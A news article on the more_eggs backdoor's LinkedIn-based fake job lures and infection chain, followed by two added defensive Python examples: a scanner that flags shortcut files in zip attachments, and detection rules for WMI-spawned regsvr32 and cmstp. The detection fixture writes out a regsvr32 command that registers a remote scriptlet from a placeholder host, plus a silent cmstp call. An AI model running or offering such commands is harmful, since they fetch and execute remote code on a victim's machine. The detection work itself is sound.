The Golden Chickens cybercriminal gang is believed to sell its more_eggs backdoor for spear phishing campaigns executed using information gleaned from victims' LinkedIn profiles.

A group of criminals behind a stealthy backdoor known as more_eggs is targeting professionals with fake job offers tailored to them based on information from their LinkedIn profiles. The gang is selling access to systems infected with the backdoor to other sophisticated cybercrime groups, including FIN6, Evilnum and Cobalt Group, that are known to target organizations from various industries.

Spear phishing with LinkedIn info

In a recent attack detected by researchers from managed detection and response firm eSentire, the hackers targeted a professional working in the healthcare technology industry with a phishing email mimicking a job offer for a position identical to the one the target had listed on their LinkedIn profile page. This seems to be a technique that this group, known in the security industry as the Golden Chickens, has also used in the past.

The rogue emails contain a zip file named after the job position the email offers. If opened, it starts a malicious Windows shortcut (.lnk) component known as VenomLNK, which serves as the first stage of the more_eggs infection.

“Golden Chickens sell the backdoor under a malware-as-a-service (MaaS) arrangement to other cybercriminals,” eSentire’s research team said in its report.
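As an added example (not code from the article or from eSentire's report), here is the kind of attachment check a mail gateway or triage script can run on a lure of this shape: open the zip in memory and flag any member that is a Windows shortcut, by extension or by the fixed header every .lnk file starts with. The archive, its file names and the shortcut bodies below are constructed for the demonstration; only the 20-byte shell-link header (from the MS-SHLLINK format) is real.

```python
import io
import zipfile

# Every Windows shell link (.lnk) opens with this fixed 20-byte header (MS-SHLLINK):
# HeaderSize 0x0000004C followed by LinkCLSID {00021401-0000-0000-C000-000000000046}
# in little-endian GUID layout. Explorer never displays the .lnk extension, so a member
# named "Resume.pdf.lnk" is shown to the victim as "Resume.pdf".
LNK_MAGIC = bytes.fromhex("4c000000" "0114020000000000c000000000000046")


def is_lnk(data: bytes) -> bool:
    """Content-based test: true if the bytes begin with the shell-link header."""
    return data[:len(LNK_MAGIC)] == LNK_MAGIC


def suspicious_members(zip_bytes: bytes) -> list[dict]:
    """Inspect a zip attachment in memory and report every member that is a
    Windows shortcut, whether the extension or the header bytes give it away."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(len(LNK_MAGIC))
            by_ext = info.filename.lower().rstrip().endswith(".lnk")
            by_magic = is_lnk(head)
            if by_ext or by_magic:
                findings.append({"name": info.filename, "by_ext": by_ext, "by_magic": by_magic})
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample attachment: a folder named after the offered job that holds a
    decoy document, a shortcut named after the job, and a shortcut hiding behind a
    document-looking name. Shortcut bodies are header bytes plus padding, not real links."""
    job = "Senior Software Engineer"  # assumed job title, not from the article
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{job}/Job Description.docx", b"PK\x03\x04 decoy body")  # placeholder, not a real docx
        zf.writestr(f"{job}/{job}.lnk", LNK_MAGIC + b"\x00" * 56)
        zf.writestr(f"{job}/Resume.pdf.lnk", LNK_MAGIC + b"\x00" * 56)
        zf.writestr(f"{job}/README.txt", b"Please open the attached offer.\r\n")
    return buf.getvalue()


if __name__ == "__main__":
    for f in suspicious_members(build_sample_zip()):
        print(f"quarantine: {f['name']} (ext={f['by_ext']}, magic={f['by_magic']})")
```

The header check is there so that the verdict does not depend on the name alone: a sample renamed for analysis, or a member whose extension the sender tried to disguise, is still classified as a shortcut. Pairing this with a rule that a zip whose name matches a job title in the subject line deserves extra scrutiny is a policy decision for the gateway, not something the code decides.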
“Once more_eggs is on the victim’s computer system, the Golden Eggs’ seedy customers can go in and infect the system with any type of malware: ransomware, credential stealers, banking malware, or simply use the backdoor as a foothold into the victim’s network so as to exfiltrate data.”

The infection chain

Once executed on a victim’s machine, VenomLNK uses Windows Management Instrumentation (WMI), a built-in Windows management interface that scripts can use to launch processes, to deploy the attack’s second stage: a malware loader known as TerraLoader.

TerraLoader abuses two legitimate, signed Windows binaries, cmstp.exe and regsvr32.exe, to load the final payload, called TerraPreter. That payload is downloaded from servers hosted on Amazon AWS, which helps it blend in with legitimate traffic and get past simple network filters, and is deployed as an ActiveX control. ActiveX is a framework that allows code execution through Internet Explorer and is supported natively on Windows. TerraLoader also drops and opens a Microsoft Word document designed to look like a legitimate employment application; this is purely a decoy so the user doesn’t become suspicious after opening the email attachment.

The TerraPreter payload signals back to the attackers’ command-and-control server that it has been deployed and is ready to receive commands. The attackers can then use it to gain hands-on access to the victim’s computer and deploy plugins or additional malware payloads.

“More_eggs maintains a stealthy profile by abusing legitimate Windows processes and feeds those process instructions via script files,” the eSentire researchers said. “Additionally, campaigns using the MaaS offering appear to be sparse and selective in comparison to typical malspam distribution networks.”

Golden Chickens’ powerful clients

The Golden Chickens seem to cater only to a select group of high-profile attackers. One of its clients is likely FIN6, a notorious financial cybercrime group that has been active since at least 2014.
This group is known for targeting physical point-of-sale systems and, more recently, online payment systems to steal card data and sell it on the underground market.

FIN6 has hit organizations from the retail, hospitality and restaurant sectors over the years and was seen using the more_eggs backdoor in attacks against e-commerce companies in 2019. In a separate 2019 campaign targeting multinational companies, FIN6 used the same phishing lure relying on fake job offers to target employees.

Another threat actor known to use more_eggs is Evilnum, a group that has targeted financial technology companies and stock trading platforms since 2018. Evilnum is also suspected of operating as a mercenary group that sells hacker-for-hire services. According to eSentire, the Evilnum attackers also spear phish the employees of the companies they target with malicious zip attachments that sometimes contain the more_eggs backdoor.

A third cybercrime actor that has been reported to use more_eggs is the Cobalt Group, also known as Carbanak. This group specializes in stealing money from banks and other financial organizations and is known for its deep reconnaissance and patience: the group can spend months inside victim networks analyzing their custom applications and workflows before striking.

Given the type of groups that use more_eggs and their sophistication, an infection with this backdoor on a network should be taken very seriously and should lead to a full forensic investigation. Attackers might already have spread to critical systems and be preparing a more serious attack, or be exfiltrating sensitive information.
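The infection chain described above gives a defender two concrete things to key on in process telemetry: a LOLBin (cmstp.exe, regsvr32.exe) whose parent is the WMI provider host, since processes created through WMI's Win32_Process.Create are spawned under WmiPrvSE.exe, and command lines that point regsvr32 at a scriptlet instead of a local DLL or run cmstp silently on an .inf in a user-writable path. The following Python is an added example, not code from the article or from eSentire, and the events are constructed Sysmon-style records; the argument patterns (scrobj.dll registration, cmstp /ni /s) are the generic abuse patterns those two binaries are known for, not the exact arguments of this campaign, and the paths, PIDs and URL are made up.

```python
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Process-creation record with the fields Sysmon Event ID 1 / EDR telemetry carry."""
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str    # its command line


# Signed Windows binaries that script- and INF-driven loaders use. The names alone are
# not suspicious, so every rule below keys on the parent process or the arguments.
LOLBINS = {"cmstp.exe", "regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe", "cscript.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: list[ProcEvent]) -> list[tuple[str, int]]:
    """Return (rule, pid) pairs for the constructed rules:
    lolbin_spawned_by_wmi     - a LOLBin whose parent is WmiPrvSE.exe, the host for
                                processes created through WMI
    regsvr32_remote_scriptlet - regsvr32 handed scrobj.dll or an /i:http(s) URL, i.e.
                                registering a remote scriptlet rather than a local DLL
    cmstp_inf_from_user_path  - cmstp run silently (/ni /s) on an .inf under a
                                user-writable path (Users or Temp)
    """
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        pname = basename(parent.image) if parent else ""
        cl = e.cmdline.lower()
        if name in LOLBINS and pname == "wmiprvse.exe":
            hits.append(("lolbin_spawned_by_wmi", e.pid))
        if name == "regsvr32.exe" and ("scrobj.dll" in cl or re.search(r"/i:\s*https?://", cl)):
            hits.append(("regsvr32_remote_scriptlet", e.pid))
        if (name == "cmstp.exe" and re.search(r"/ni\b", cl) and re.search(r"/s\b", cl)
                and ".inf" in cl and re.search(r"\\(users|temp)\\", cl)):
            hits.append(("cmstp_inf_from_user_path", e.pid))
    return hits


def ancestry(events: list[ProcEvent], pid: int) -> list[str]:
    """Walk the parent chain upward so the analyst sees the lineage, not only the alerting process."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain


# Constructed telemetry: a WMI-hosted regsvr32 and cmstp (the shape of the chain in the
# article) plus a benign regsvr32 launched from Explorer that must not alert.
SAMPLE_EVENTS = [
    ProcEvent(800, 4,   r"C:\Windows\System32\svchost.exe", "svchost.exe -k DcomLaunch"),
    ProcEvent(100, 50,  r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 800, r"C:\Windows\System32\wbem\WmiPrvSE.exe", "WmiPrvSE.exe"),
    ProcEvent(300, 200, r"C:\Windows\System32\regsvr32.exe",
              r"regsvr32.exe /s /n /u /i:https://cdn.example.invalid/offer.sct scrobj.dll"),
    ProcEvent(400, 200, r"C:\Windows\System32\cmstp.exe",
              r"cmstp.exe /ni /s C:\Users\jdoe\AppData\Local\Temp\profile.inf"),
    ProcEvent(500, 100, r"C:\Windows\System32\regsvr32.exe",
              r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'),
]


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}, chain {' <- '.join(ancestry(SAMPLE_EVENTS, pid))}")
```

The first rule is the one worth deploying as an alert: legitimate software rarely has WmiPrvSE.exe launch cmstp or regsvr32. The other two are hunting rules that will need tuning, because administrators do install connection profiles with cmstp and some installers do call regsvr32 with unusual arguments; the ancestry output is what lets a responder tell those apart quickly, and a hit on a host is the moment to start the forensic investigation the article recommends rather than simply killing the process.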